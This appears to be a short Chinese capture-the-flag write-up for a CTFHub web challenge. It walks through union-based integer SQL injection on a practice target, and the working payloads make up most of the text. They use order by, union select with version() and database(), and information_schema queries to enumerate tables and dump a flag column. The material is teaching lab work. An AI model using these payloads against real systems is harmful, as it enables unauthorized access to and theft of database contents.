2017-赛客夏令营-Web-injection
启动靶机,打开环境:
页面只有一句话:
Practice makes perfect.(实践使人完美。)
观察到链接中存在GET
传参:
根据题目名与连接中的GET
传参判断应该为注入
输入'
(单引号)查看,并无回显,判断为整形注入
尝试查看列数:
1 order by 2 #
成功回显,推断其有两列
继续判断其回显点位:
1111 union select 11,22 #
得到回显内容:22
判断出22
为回显点位,查看当前数据库版本信息:
1111 union select 11,version(); #
继续查看数据库名:
1111 union select 11,database(); #
查询到当前数据库名为:ctfhub
,继续查询该数据库中的表名:
11111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
通过group_concat()
函数将所有的表查询出来,得到flag
和info
两个表:
继续查询flag
表中的列:
11111 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #
查询到flag
表中只有flag
一列:
查看flag
列中的内容:
11111 union select 1,flag from ctfhub.flag #
得到flag
很基础的SQL注入